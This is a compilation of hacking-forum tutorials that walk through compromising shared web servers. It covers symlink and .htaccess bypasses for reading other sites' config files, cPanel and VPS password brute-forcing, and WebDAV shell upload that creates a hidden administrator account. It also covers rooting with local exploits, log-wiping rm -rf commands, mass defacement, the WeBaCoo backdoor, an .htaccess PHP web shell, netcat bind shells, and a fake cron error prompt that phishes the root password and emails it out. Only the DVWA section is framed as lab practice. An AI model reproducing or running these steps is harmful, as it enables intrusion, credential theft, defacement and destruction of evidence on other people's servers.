the username and path of where the sites are located . 2013 Server mostly Many functions are enabled which shows 403 forbidden when you try to read cat /etc/passwd from the server
so i made a Powerfull Shell which can bypass and get /etc/passwd from the server. I will also add it to the Downloads. Upload the /etc/passwd bypasser shell and get all /etc/passwd Then Login to Sen Haxor CGI Shell and create a symbolic link to your Target  Step 1 : ln -s / root  Step 2 : ln -s /home/username/public_html/config.php 1.shtml Example if our site is www.site.com and username is site and its Wordpress ln -s /home/site/public_html/wp-config.php 1.shtml So we created a Symbolic link to our Target now you need to Go to Your Shell and Edit the .htaccess with the following Code : Options +FollowSymlinks DirectoryIndex itti.html RemoveHandler .php AddType application/octet-stream .php Once you done this Open the 1.shtml on your Browser and rightclick and view source . You will be able to View the Config . This is the common way of Bypass 403 forbidden and Litespeed . Now Let Me Explain You the Advanced Method =) Method 2 : Bypassing Symlinked Config From Cpanel For This You need atleast One Cpanel Access on the sever . I will tell you how to easily crack Cpanel . First Run This Command : ls /var/mail Then you will be displayed with all username from the server Copy all . Now Upload Turbo Brute Force Cpanel Script ( i will attach it will the downloads). Open the Script and in User Paste all the username we got . And for Password here is the wordlist :
Copy All and Paste it on Password Select Simple and Click Submit If Your lucky you will be displayed with cracked cpanels. Once you got a cpanel on the server You can Bypass 500 Internel Server Error 403 Forbidden Error From Port :2077 and From error-pages from file manager. Just symlink the config ln -s /home/user/public_html/wp-config.php config.shtml Login to the cpanel Then Go to File Manager -> Error Pages Then Choose any of these according to what error is triggered when you open your symlinked config 400 (Bad request) 401 (Authorization required) 403 (Forbidden) 404 (Not found) 500 (Internal server error) Example "&file=400.shtml&desc=(Bad request) we can get the config by "&file=config.shtml& desc=(Bad request) BYPASS SYMLINK FROM PORT 2077 So once you Symlinked the Config You can just login to port 2077 Then public_html/path/config.shtml You will be able download the config.shtml and you can view the source . Method 3 : Symlink Bypass via Open Port using Python For this First we Python to be Installed on Server. To check if Python is installed run this command python -h If its install we can use the following python script and Bypass
#!/usr/bin/env python # devilzc0de.org (c) 2012 import SimpleHTTPServer import SocketServer import os port = 13123 if __name__=='__main__': os.chdir('/') Handler = SimpleHTTPServer.SimpleHTTPRequestHandler httpd = SocketServer.TCPServer(("", port), Handler) print("Now open this server on webbrowser at port : " + str(port)) print("example: http://site.com :" + str(port)) httpd.serve_forever() I have added the script to downloads . Now Upload the script to the shell http://foto.pk/images/205cjg3.jpg now run this command : python port.py http://foto.pk/images/2je1wqq.jpg Now Open the site with port 13123 www.site.com:13123
http://foto.pk/images/j5ifwm.jpg Server Bypassed From Open Port . Method 4 : Bypassing Symlink Using .ini Method Login to Sen Haxor CGI shell normally create a symlink to your target in .ini Extension . ln -s /home/user/public_html/wp-config.php config.ini now go to the shell and make a new file a.shtml Paste the following code inside it and save it <!--#include virtual="config.ini"--> and save it . Now open the a.shtml in the browser and right click and view the source . Done Bypassed Method 5 : Bypassing Symlink Using ReadMe file Make a new directory in your shell From the Cgi shell normally symlink the config ln -s /home/user/public_html/config.php config.txt now make .htaccess with the following code . .htaccess Options All ReadMeName config.txt Now when you open the directory on the browser you will be displayed with the config source directly . eg : site.com/sen/config.txt is your symlinked config then when you open www.site.com/sen/ you symlinked config will be displayed as a ReadMe content . Thats it i have explain All the Methods to Bypass Symlink If you will have problem Bypassing Try all the Following .htaccess 1 - > .htaccess Options Indexes FollowSymLinks DirectoryIndex ssssss.htm
AddType txt .php AddHandler txt .php 2 -> .htaccess Options All DirectoryIndex ssss.html addType txt .php AddHandler txt .php <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> 3 -> .htaccess suPHP_ConfigPath /home/user/public_html/php.ini 4 -> .htaccess Options +FollowSymLinks DirectoryIndex Sux.html Options +Indexes AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html 5 -> .htaccess Options Indexes FollowSymLinks DirectoryIndex ssssss.htm AddType txt .php AddHandler txt .php
<IfModule mod_autoindex.c> IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble </ ifModule> <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> .HTACCESS TO BYPASS DISABLED FUNCTIONS This one is to make python work : .htaccess AddType application/x-httpd-cgi .py AddHandler cgi-script .py AddHandler cgi-script .py This one is to make perl work : .htaccess AddType application/x-httpd-cgi .pl AddHandler cgi-script .pl AddHandler cgi-script .pl
This one is to enable Symlink if the function is disabled in the server : .htaccess <Directory "/home"> *** Options -ExecCGI* *** AllowOverride AuthConfig Indexes Limit FileInfo Options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks </ Directory> This one is to retrieve users permissions : .htaccess AddType text/plain .php Options +Indexes DirectoryIndex filename.html Bypass Internal Server error : .htaccess <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> Change php version: .htaccess AddType application/x-httpd-php4 .php
Bypass Uploads Options and upload shell in another extension : <FilesMatch "^.*.mp3"> SetHandler application/x-httpd-php </FilesMatch> Retrieve Config with picture method : .htaccess Options FollowSymLinks MultiViews Indexes ExecCGI AddType application/x-httpd-cgi .gif AddHandler cgi-script .gif AddHandler cgi-script .gif DOWNLOAD LINK OF THE SCRIPTS I HAVE USED ON THE TUTORIAL : www.mediafire.com/download/08oeos9cpaloeum/Bypass_Symlink_on_2013_Server_With_Diff erent_.htaccess_and_Methods_by_Sen_Haxor.rar So thats it i think i had covered everything thats related to Bypass Symlink and Disabled Functions on Server . If you still face Problem in Symlink Contact me : www.facebook.com/cheenu.vis Greetz : Lucky - Ashell - Ethicalnoob - Striker - Zagar Yasir - CyberAce Legion - Yash bro - Godzilla - Architkp - RooT_Devil -Navneeth Singh - Cyberboy India- Cooltoad_ICA - Suriya Prakash - Avinash Mohiti - Ion -Shorty420 - Suriya Subash - Darkw0lf - Manoj Nath -Sksking Decoder - Rafay Bolach -Mike Wals - Team Indishell and all Indian Hackers
Hack WebDAV & Deface Alright guy's today in this tutorial I'll be explaining how to use the webdav exploit. The link for the tools used for this tutorial can be found in the bottom of this tutorial. For those of you who do not know what a Webdav is here is the definition. Web-based Distributed Authoring and Versioning, or WebDAV, is a set of extensions to the Hypertext Transfer Protocol (HTTP) that allows computer- users to edit and manage files collaboratively on remote World Wide Web servers. But fo our purpose we will be using it to exploit RDP's or the Remote Desktop Protocol. For a better understanding of these with RDP's they could range from Vp's to Dedi's to just plain old home Pc's, but no matter what it is you will gain full access to the machine and can basically do whatever you want using a shell. For those of you who are new to the hacking scene a shell is a php script that allows you to view all of the files on the server you decide to host the shell on. The most common shells are the c99 or the r57, but in this case we will be using the c99. Now please be aware these are not the only shells available there are several posted throughout the forum and you can find them by simply using the search button located on the navbar. Now before being able to use the shell we have to find some vulnerable Ip's to gain access to for this we will be using the WebdavlinkCrawler which can be found in the webdav tools kit I have provided below here if you don't trust my download links simply don't download them it's that simple. Once you have managed to open the program you will be presented with this interface.
as you can see there is a Start, Stop, and Remove double. All of these terms will be explained later on, but what you are going to want to do is click the start button and it will being to search for the Ip's with webdav in them. Once you have managed to gather some ip's like you see in the picture here Now please be aware this was only with about 15 seconds of searching and your results may differ depending on your connection speed as well as the amount of time you run the application. After you have all of your Ip's your going to want to click one so it's highlighted and the right click it you will be presented with a popup that looks like this I have no idea what that actually means,(if someone would like to translate and tell me please feel free.) but what it is doing is copying all of the Ip's you have scanned. After you have scanned all of the Ip's your going to want to paste them in a new word document
once you have done so save it as something you can remember and put it in a convenient location. After you have saved your collected webdav Ip's in a word document your going to want to open the Ip Scanner in the folder. It will look like this what your going to want to do is click the "Get Ip's" button and browse to your recently saved text file. After you have your ip's in place
your going to want to press the scan button what this is doing is now taking all of your Webdav Ip's and figuring out which one's are vulnerable to this particular exploit. The one's on the right are the ones it scanned and if you happen to get any in the middle those are the one's you can exploit. In my case this time I didn't happen to have any that were open to this exploit because I had a limited amount of Ip's. After you have managed to gather some ip's in the middle column and are ready to exploit the server you can just double check by going to the ip/webdav/ in your browser and Ip being one of the exploited ones you managed to get and your going to be looking for an index page that says Webdav Test page. After you have confirmed it is ready to go your going to want to open "map network drive" this can be found by either right clicking Network or my computer in the start menu. what your going to want to click on is the hyperlink that reads " Connect to a website that you can use to store your document's and pictures. You will be presented with a screen all you have to do is click next. And the your going to want to click Choose a custom network location.
Now this is the important screen it should look like this What you have to do is put the Ip/webdav in the text box and click next
you should then be prompted with a login box the default username is wampp and the default password is xampp. Once you have successfully connected you can now browse it's folder's so what you have to do now is just drag and drop the shell.php in side the main directory After doing so go to ip/webdav/shell.php it should look like the following
Feel free to use that Ip if you are that much of a noob and cannot do anything for yourself. Once you are viewing your shell inside the execute textbox your going to want to do the following commands net localgroup administrators SUPPORT /Add What this is doing is making the remote desktop username SUPPORT and the password !password!. So now the last and final step is to open remote desktop and connect using the Ip and the login detail's we have just created. The shell is for you to explore and discover for yourself. Now you may be wondering What can you do once your in? Answer : 1.You can do so much! Plant Rootkits/ Upload your RAT on the server:D 2. I upload my RAT’s incase they try to take back there dedi. 3. Host a web IRC bot or Shell Booter 4. Store files or host websites or shells 5. Make a Botnet! TOOLS: http://dl.dropbox.com/u/18083172/Webdav%20tools.rar
Root server without local root exploit Many hackers find it difficult to find a local root exploit for rooting the server. So here is few methods you could try to gain root acess without using a local root exploit! 1. Custom Cron Tab Scripts Cron Jobs are some Tasks that are set to be Executed at a specific time. If the Root user has created a Custom Script used by Cron, and we can Write on this File, we can send a “Fake” Error Message and the Root user will probably type in his password. First, check out if there are any Cron Job Tasks: crontab -l If you see any Custom Script, we must Check out if we can Write on it. Let’s say we got a Custom script here: /bin/cronscript To check if we can Write a File, type: stat /bin/cronscript (If you get something like: “-rwxrwxrwx” in the output, you can edit the File!) Let’s edit the file and send a Fake Error Message. Make a Copy of the Original Script to /bin/cronscript.bak : cp /bin/cronscript /bin/cronscript.bak Edit the /bin/cronscript like this: #!/bin/sh echo “An System Error Occured!” echo “” echo “Error Code: #131425″ echo “” echo “Update to get the Latest Patch for this Security Issue.” read -s -p “[sudo] password for root ” rootpasswd echo “” echo “su: Authentication failure”
echo “” sudo apt-get update && sudo apt-get upgrade sudo echo “The Password is: $rootpasswd” > .kod mail -s “Root’s Password” “ email@address.com ” < .kod rm .kod mv cronscript.bak cronscript You should just Replace the Underlined with your E-Mail and the Name of the Script! After you save the File, type: chmod +x cronscript to set it as Executable! This script will: - Send a Fake Error Message - Request for the Root’s Password - Send to your E-Mail Address the Password (make sure that there is the “ mail ” command at the /bin ) - Restore the Original File When the Script gets Executed, the Root User will Enter his Password and it will be send to you! It would be better if you had some knowledge on Bash Programming… 2. Enumerating all SUID Files An SUID File is any file that any User group has the Priviliges to Access, Read and Write on it. What does this mean for you: You can Escalate Priviliges in this way, if it is in an Important Directory. you can Social-Engineer a Privileged User. To find all SUID Files, type: find / -user root -perm -4000 -print This will show all the SUID Files to your Terminal. Take your time and check them as they can help you to escalate Priviliges! 3. Brute Forcing I know what you are thinking after seeing the title, well this is different the tool we gonna use is called Rootdabitch What is so special in this?
The magic about this tool is that It works in background, so you can leave it working for days until you have results... when the password is cracked it will be mailed to you :) For this, you need to have phpshell/ reverse shell / ssh access to the target to run this tool, You can get the tool here Rootdabitch v0.1 Usage: ./rootdabitch.sh youremail@site.com For kiddies: First download rootdabitch to the server: wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip Extract it by the following cmd: unzip rootdabitch-0.1.zip Chmod it to 755: chmod + x rootdabitch.sh Finally run the script ./rootdabitch.sh youremail@site.com Simply just chmod it and run the script. If the password is cracked you will have a mail containing the root password which will be in the file "passwords.txt" attached to the mail
LINUX SERVER ROOTING Hello Hax0rtools.com Readers today i will show you how to root a server Root is the Administrator of all server. If someone got root access he can do anything with server like delete and copy anything on server ; can deface all the home pages (massive deface ) Although there are mainly 3 wayz in which you can get into the server but here we will take the first method that is by local root NEEDS :  Netcat (Download from Here)  Shelled site (Best Shellz Here)  Local root exploit (which you can find it Here Or Download This collection Here) STEPS:  In RUN program type cmd then type this cd C:Program FilesNetcat but first save your netcat in the directory
After it type this : nc -n -l -v -p 443 , and you will get this - Now open the url in which you had upload your shell and then connect it using back connect option in the shell(Be careful some shell do not have this option and do not use any proxy,tor or VPN), when connection is established you will get something like this - Now you have successfully connected .. then we have to get the local root exploit like now we have 2.6.18-374 2011 .
 Now we have to first upload our exploit in a writable folder, simply we can just change the directory to the /tmp folder which is a standard writable folder . command to change dir to /tmp : cd /tmp  To upload your your exploit we will use the wget function . Now Type : wget http://www.example.com/exploit.c Now exploit will be uploaded to tmp folder (CASE TYPE 1) if you have uploaded your exploit as (exploit.c) the we have to compile it, so to compile it we will type the following command .
Type : gcc exploit.c -o exploit Note that above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit. (CASE TYPE 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command . Type: unzip exploit.zip  After we have done all the above steps correctly, its time to give permission so we will type the following command Type: chmod 777 exploit  Now its time to run the Exploit, to run the exploit we will type the following command Type: ./exploit Now the exploit will run & the server will be rooted ;) . To check weather we got root we can type Type: id or whoami NOW HOW TO CLEAR THE LOG AND COME OUT SAFELY FROM SERVER If you do not want to caught yourself by Cops then delete the log using following commands rm -rf /tmp/logs rm -rf $HISTFILE
rm -rf /root/.ksh_history rm -rf /root/.bash_history rm -rf /root/.ksh_history rm -rf /root/.bash_logout rm -rf /usr/local/apache/logs rm -rf /usr/local/apache/log rm -rf /var/apache/logs rm -rf /var/apache/log rm -rf /var/run/utmp rm -rf /var/logs rm -rf /var/log rm -rf /var/adm rm -rf /etc/wtmp rm -rf /etc/utmp history -c find / -name *.bash_history -exec rm -rf {} ; find / -name *.bash_logout -exec rm -rf {} ; find / -name "log*" -exec rm -rf {} ; find / -name *.log -exec rm -rf {} ; i hope you had learn how to root a server My next Tutorial will be about How to mass deface after rooting a server.
Cpanel Cracking Things Required :-  Shelled site ( Download Best Shellz Here)  Cpanel Password Cracker (Download Password : www.hax0rtools.com) Step By Step Tutorial :-  First open you shell & upload the cpanel password cracker shell  Then go down & click on User .  Now after you have clicked on User, below you will get all the usernames of the Cpanel . So now move to next step, your next step will be to get a good Password list for a Dictionary attack . After getting it you have to copy the username & paste it in the username block (above) & paste the password list in the password block .Then finally click on start .
Tip: Password list should be short & effective .  When the cracking is finished, you will see the result .  After Getting the login info you can login by going to -> www.site.com:2082 or www.site.com/cpanel
Bypass 403 Forbidden And Cant Read /Etc/Named.Config Error Now days most of the Linux Kernel server show this error when you try to symlink the server . Most of the server which shows 403 forbidden has cant read named.config error when you try to symlink using scripts like Symlink_Sa or Madspot Security Team Shell or what ever script used for Automated Symlink . This can be bypassed by Reading /ect/passwd and Symlink_Sa 3.0 can be used to bypass this . I will be posting the download link of some shells i will be using in this tutorial Best Script which can bypass cant read /ect/named.conf are : 1. Config Fucker By Web Root Hack Tools. ( Mass Symlink Config files ) 2. Config Killer By Team Indishell . ( Mass Symlink Config file php based script ) 3. Symlink Pain [~] allsoft.pl ( Perl Script to Mass Symlink Config files ) 4. Symlink_Sa 3.0 Automated Symlink Script . Usage : Config Fucker , Con fig Killer and Symlink Pain [~] Perl script just upload them on to the server make sure that you create a new directory . Upload the scirpt and use the command cat /ect/passwd to read all /ect/passwd from the server and copy them and just open your script and paste it there and click on Get Config and Your Done . Just open the link of the folder you created eg . site.com/sen/allsoft.pl you need to open site.com/sen/ and all config files will be there Note : Its better to create a php.ini file before you do this for 100 % Result All 4 shells i have mentioned i will post the download link And i will be using a another private shell for this which i wont be giving you
all for Priv8 Issue its Mannu Shell Coded by Team Indishell Which can bypass cant read /ect/named.conf error easily . But 403 Forbidden Server cant be bypassed using this shell . So now if we cant symlink to the Public_html/ of the website we can use Symlink_sa 3.0 script Symlink Bypass Option - So now that we can easily Symlink to /Public_html/ path of each website Now some server show 403 forbidden Error when you try to Symlink them so now lets see how to by pass this shit For 403 Forbidden Error i will be Using the Following Shells : 1. Dhanush Shell Coded By Arjun . ( This shell automitically creates
.htaccess , php.ini and ini.php files after you login ) 2. Mannu Shell by Team Indishell Private ! . 3. Symlink_sa 3.0 Script I will be posting the download link of Dhanush shell and Symlink _sa 3.0 ( Mannu shell is private as i already told ) So what is the trick that makes us bypass 403 Forbidden , Its just the .htaccess and php.ini which contains the following code : .htaccess <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule> php.ini <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["ss"]); ?> 1.) 403 Forbidden Error : 2.) Open Dhanush Shell which automatically creates .htaccess , php.ini and ini.php .
3.) Mannu shell to Check if we Bypassed 403 Error : 4.) Bypassed 403 Forbidden and Access to Public_html/ Path Bypassed can't read /ect/named.conf and 403 forbidden Error
Backdoor a WEB SERVERS WITH WEBACOO WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit that provides a terminal connection over HTTP between client and web server. It is an exploitation tool to maintain access to a web server (hacked). WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving stealth mechanism to execute commands on the compromised server. File obfuscated performs communication via HTTP header’s Cookie validating HTTP requests and responses from the web server. WeBaCoo provides a way to generate the code to create the PHP backdoor using predefined payloads. It also offers the “terminal” mode in which the user can establish a remote connection to the server and execute commands with privileges of the web service desired. In many cases, this tool is used when a server does not have the Netcat. INSTALLATION: git clone git :/ / github.com / anestisb / WeBaCoo.git wget http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz . / Webacoo.pl-h COMMANDS: 1) Create obfuscated backdoor ‘backdoor.php’ with default settings: . / Webacoo.pl-g-o backdoor.php 2) Create ‘raw-backdoor.php’ backdoor de-obfuscated using the work “transit” . / Webacoo.pl-g-o raw-backdoor.php-f 4-r 3) Set “terminal” connection to the remote host using the default settings: . / Webacoo.pl-t-u http://127.0.0.1/backdoor.php
4) Set “terminal” connection to the remote host to configure some arguments: . / Webacoo.pl-t-u-c http://127.0.0.1/backdoor.php “Test-Cookie”-d “TTT” 5) Set “terminal” connection to the remote host via HTTP proxy: . / Webacoo.pl-t-u-p 127.0.0.1:8080 http://10.0.1.13/backdoor.php 6) Set “terminal” connection to the remote host via HTTP proxy with basic authentication: . / Webacoo.pl-t-u-p http://10.0.1.13/backdoor.php user: password: 10.0.1.8:3128 7) Set “terminal” connection to the remote host via Tor and record activity: . / Webacoo.pl-t-u-p http://example.com/backdoor.php tor-l webacoo_log.txt Now, having installed the tool and knowing the commands, we will create the backdoor to get connection to the web server from the console. For this case I obtained any server (hacked) where I’ll upload the backdoor that creare with the following command: . / Webacoo.pl-g-o backdoor.php The backdoor.php is created and placed in the folder of files (WeBaCoo), then go up the file to the server (hacked) and proceed to connect to the server with the following command: . / Webacoo.pl-t-u http://www.sitio-web.com/backdoor.php
The connection to the server is perfect, so you get very fast connection. Simple commands: In this case will place “load” to see the commands that will handle the entire server, which are: 1) MySQL-CLI: MySQL Command Line Module: mysql-cli (ex. ‘mysql-cli 10.0.1.11 admin pass’) 2) PSQL-CLI: Postgres Command Line Module:
psql-cli (ex. ‘testdb psql-cli 10.0.1.12 root pass’) 3) Upload: File Upload Module: upload (ex. ‘upload exploit.c / tmp /’) 4) Download: File Download Module: download (ex. ‘download config.php’) 5) Stealth: Stealth Enhance Module stealth (ex. ‘stealth / var / www / html’) These commands are easy to use, do a brief demonstration with MySQL-CLI command for db and connect to the server. 1) Download the configuration file: download configuration.php
2) Open the configuration.php file copy of the MySQL user and password, you type the command: mysql-cli 127.0.0.1:3306 db_user db_password 3) The tool will connect to MySQL, we can only type show databases; to appreciate all the DB. Similarly use other commands to upload a local root exploit or download any server. Now with this tool you no longer need to have the web server or make a BackConnection Netcat often fails, to connect to a web server.
Web Server Hacking through Command Injection Web Server Hacking through Command Injection Hello, Folks! do you know ? Command Injection is the most dangerous Web Vulnerability, its little harder to find. Command Injection is also called Command Execution, Code Injection, or Remote code execution. well it's my first post on command injection so - I'll start from basic and simple tutorial may be i'll post some advance techniques in future, depend upon my learning #Command execution is my favorite vulnerability :) What is Command Injection : Command Injection is one of the most dangerous web vulnerability which occurs due to unauthorized commands send by an attacker to Web Server and server accept it without proper client input validation which is connected to system server application and doesn't have any type of Filter or any whitelist of blocking unwanted commands, that allows an attacker to inject any command on Website Server Operating System. One simple example of Command Injection : Assume that your current Computer is Web Server and as you all know every web hosters needs an Operating system that is called server - like : Linux, Windows, Unix etc. Every website has it's own Server and Operating system which is connected to World Wide Web. Cool, now every OS have Terminal like Command Prompt in windows. Now assume that you create a web application that allows any user to ping IP then definitely you've to connect your terminal or command prompt with Web Application (Reason only OS Terminal
connected to WWW can ping any requested IP) without any user input filteration and validation your application blindly trusts on users client request and execute it on Web Server OS Terminal. So what if an attacker determine your application is vulnerable to command injection and send unauthorized commands to Server Terminal.. you know he can gain complete access to your Web Server. It's like you handed your OS terminal in an attackers hand, so of-course if you have control on OS Terminal then you can do anything on Web Server like, Shell Upload, Web Site Deface, Database takeover, creating multiple vulnerabilities, etc. Understanding Complete Command Injection : Fine, guys if you still didn't understand what exactly is command injection and how it works then here i got simple tutorial for you. Just follow the below's steps and learn Command execution in a day. Requirements : DVWA Pen-testing lab or OWASP BWA - (DVWA) Basic knowledge of Windows CMD and Linux Terminal Little Networking Knowledge Burp Suite (Not Recommended) Brain! Simple Command Execution tutorial for Beginners : I'm gonna show you simple command execution tutorial through OWASP BWA (DVWA) Pentest lab that runs on Virtual Machine, we'll execute our command on server and will able to Take down complete Website. As you know DVWA is already vulnerable to Command execution (for Pentesting) so we don't need to find it, directly determine the OS and execute commands. Now, in below image you can see that Burp Suite found server information : Click on Image to enlarge it
Or, you can also Nmap for more information : Click on Image to enlarge it If you have little knowledge of Networking you can easily understand what it is and how stuffs work, If you want to learn Networking click here. To become an expert in Command execution you've to learn Linux, Python, Perl, C and DOS Programming languages not completely but you must know about 40% to 50%. So guys back to Injection attack. Open DVWA - (Command Injection) Vulnerability, as i told you DVWA Web App allows anyone to Ping an IP that is connected with Command Prompt, (Check source code) to know how web app works. Click on Image to enlarge it Try to understand how exactly works and what we've to do to Hack Web Server. As you know complete server can be compromised via Command Prompt and Terminal. Normally we use this command to ping an IP using Command Prompt in Windows : "ping WEBSITE YOU WANT TO PING"
Click on Image to enlarge it The same DVWA Web application do, that means we're totally on Command Prompt and as you saw source code it doesn't have any type filter to filter users input and save server from Command Injection attacks. Now give a try to DVWA with one IP request to see how it works. I Pinged 127.0.0.1 IP to see how it works and it simply.. now we can use some evil mind to compromise web server with command injection. Check Vulnerability with "& ls" command. In generally method we use "ls" to get list of files and folders around the directory. Click on Image to enlarge it
Now any Noob can understand that we got complete access to web server command prompt, so easily an attacker can totally compromise server. lets try with this command "& cd ../../../../../../../../WINDOWS/system32 & dir" You'll get a big Huge page with complete directory names, files and folders you can also search for cmd.exe Click on Image to enlarge it Now how to hack complete web server and get database, and all files even we can gain root access. So just we need to upload our backdoor, Click here to learn how to upload C99 Shell PHP backdoor and Hack website using Command Execution. Thank you for reading our post, Stay tuned with us and please share it to increase us, and always feel free to comment and let me know your problem.
How To Hack Windows Servers Using Dubrute 2.2 Hello, Today im sharing u How to Hack Many many Windows VPS. All u need 2 Softwares called DuBrute and Vnc_scanner to hack VPS. Download Links : Vnc_scanner : Here Dubrute : Here How to Use ? 1) Download both the files from the above link. 2) Extract both the files anywhere in ur pc. 3) Open Vnc_scanner folder 4) Open the exe file called vnc_scanner_gui.exe 5) Select any Country. 6) Click on Get Dial List After the all ip list Came then :
7) Click on Start Scan After that it will scan for VPS working ips.
After Scan finished click on Start parser.It will save good ips in new text file called IPs.txt. Now u need to get the usernames and Passwords for Scanned ips.For that u have to use one of the hacking software called Dubrute. 1) Open Dubrute folder 2) Copy the IPs.txt file from vnc_scanner folder and paste in Dubrute folder 3) Open the DUBrute.exe 4) Click on Generation 5) Check the image below.
1st click on File ip then select the text file called IPs.txt and Open 2nd Select File Login then Open and then File Pass and Open. 3rd ,Click on Make and Press Ok. Then Click on Exit Now press Start in ur Dubrute. Let it brute the combinations.When a working VPS which match IP , Username and Pass , it would be saved in Dubrute folder File called goog.txt
Like dis : In this Image shows that I found 3 VPS which is working. Note : Both the files has Virus.Ur anti-virus detect as Trojan etc.So when u download ,if ur anti- virus active then it will delete ur files.If u want to use then u have to turn off ur anti virus.Or u can hack vps with a VPS like me.I downloaded THese files on a VPS and hacked it ;P.These soft i used to hack VPS from last 1-2 weeks.I hacked around 100 working VPS. This is a Detailed Tutorial about How to hack VPS ?.Should u have more doubt on this , feel free to reply here.am here to help u. Thanks and Good Luck to all for hack many many VPS. How to use VPS Go to Start > Run > Type mstsc and press OK Then put ur VPS ip and Connect.Then Type ur ID and pass then OK Thats it.U are into the Virtual Private Server How to Change Pass of VPS? Press Ctrl + Alt + End u will see the option for Change pass. Note : U could change pass if only u have the permission from the Administrator. Respect !
Symlink Tutorial for beginners What do you mean by Symbolic links? In computing, a symbolic link (also symlink or soft link) is a special type of file that contains a reference to another file or directory in the form of an absolute or relative path and that affects pathname resolution. How to Do Symlink on Web-server ? In Symlink you need to shell access like GNY,C99,r57 etc.. on website.. It's look like this Now You need To create 1 directory with any Name like sym,test etc.... Now after Creating Directory You need 2 file 1. Blank .txt file in zip format. 2. .htaccess The txt file include this "/" and save it.. and .htaccess file include this below code: Options Indexes FollowSymLinks DirectoryIndex test.htm AddType txt .phpAddHandler txt .php and save it like ".htaccess" now you need to upload both file zip and .htaccess. After Uploading both file We need to "unzip" file using this command: "unzip "file name" " after unzip u show a txt file there. Now you need to open appropriate path in Web browser. It's look like this.
Now Just Click on 1.txt file that you unzip a zip file. After Click on 1.txt file It include all Directory's of the Web-server check out below Image: Ok done Now in Symlink we will check the Directory path like 1. /home/"Website Username"/Public_html/ 2. /hsphere/local/home/c283273/ There are Different Path Just you need to check out it. If you Click On "Home" You will get 403 Error Means Forbidden Error but never mid after you get this Error you need to add "Website Username" To find WebUsers You need to execute This command cat /etc/passwd the path is "/Home/"website username"/public_html/"
After execute cat command it's look like above image. Now Just find specific Target that have ADMIN LOGIN PAGE and CONFIG FILE How did you find this specific Target site? you need Server Ip and www.bing.com To find Joomla,Wordpress and php site we can use this dork for it. 1. ip: 123.x.x.x index.php?option=2. ip: 123.x.x.x "Powered By WordPress" 3. ip: 123.x.x.x .php?id= and more...... Finding Target site now you need to find config file. in joomla the config file name is "configuration.php" in wordpress "wp-config.php" etc. You cannot directly see the file using like this www.Target.com/wp-config.php www.Target.com/configuration.php But when we do symlink on specific Target we can show config file using Right click and view source.. It's look like above Image This config file include site Database information like Database Name, Username, Password etc.. after getting this You can login into site data base and you can edit,delete of specific columns, fields etc.. But we need to change admin password. In many case The password is in MD5, base64 etc.. encrypted form. You need to Decrypt it... that's it. after changing the password You know what to do...!!!
MASS DEFACE TUTORIAL today i will tell you how to mass deface in few steps .. so lets start . Things Required:  Rooted server (check how to root a linux server tutorial : Here)  Mass deface script ( Download from Here password :www.hax0rtools.com ) Step By Step Guide :  First we have to download our mass deface file, so as usual we will use the wget function Type: wget www.somesite.in/massdeface.zip  As we have downloaded it in a zip file, now we will unzip it by typing Type: unzip massdeface.zip
 One you have unziped it , we will now run the script by typing Type: perl massdeface.pl  Now after we have run the script it will show its usage [ perl mass.pl /tmp/index.html ], so according to that we have to run it, but before we do so we have to download our deface page using wget . Type: wget http://www.somesite.com/index.html So once we have downloaded our deface page, now we will run the final command to mass deface . Type: perl massdeface.pl /tmp/index.html
ATTACKING WEBSERVERS VIA .HTACCESS A while back I was testing a CMS that had a curious feature, all uploaded files were placed in their own directory. This was not a security enhancement as the application allowed php files to be uploaded. However I coudn't help ask, what if php uploads had been restricted? The answer was .htaccess files. Using SetHandler in a .htaccess file is well known, but does not lead to remote code execution. So after some thinking I put together some self contained .htaccess web shells. I wrote both a php and a server side include shells, but other options can easily be added (jsp, mod_perl, etc). This works by first diverting the default apache .htaccess access restriction from within the .htaccess file so we can access it as a url. Next we reconfigure the .htaccess extension to be treated as a dynamic content script and finally we have our payload. The attack works because the .htaccess parsing and processing for apache configuration directives occur before the .htaccess file is processed as a web request. There is a relatively small gotcha, the payload has to be commented out with a # at the start so it doesn't get interpreted by apache and likewise, the script interpreter must ignore the apache directives. PHP lends itself well to this as any content not within the <?php ?> tags are presented as is. 01 # Self contained .htaccess web shell - Part of the htshell project 02 # Written by Wireghoul - http://www.justanotherhacker.com
03 04 # Override default deny rule to make .htaccess file accessible over web 05 <Files ~ "^.ht"> 06 Order allow,deny 07 Allow from all 08 </Files> 09 10 # Make .htaccess file be interpreted as php file. This occur after apache has interpreted 11 # the apache directoves from the .htaccess file 12 AddType application/x-httpd-php .htaccess 13 14 ###### SHELL ###### <?php echo "n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ###### Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the url http://domain/path/.htaccess?c=command for remote code execution. The collection of attack files are collectively accessible from my github htshells repository.
How to Backconnect with netcat 1.you need download this netcat windows-http://anonym.to/?http://joncraton.o...at-for-windows nc to upload with shell-http://www.multiupload.nl/TOBD6TAOXE 2.upload nc with shell 3.set chmod 777 for nc Quote: chmod 777 nc
4.run command ./nc -vv -l -p [port] -e /bin/bash at shell Quote: ./nc -vv -l -p 4499 -e /bin/bash 5.open cmd direct to where nc save like this cd c: and run this command nc -vv [ip target] [port] Quote: C:>nc -vv ip server 4499 6.now you have back connect it
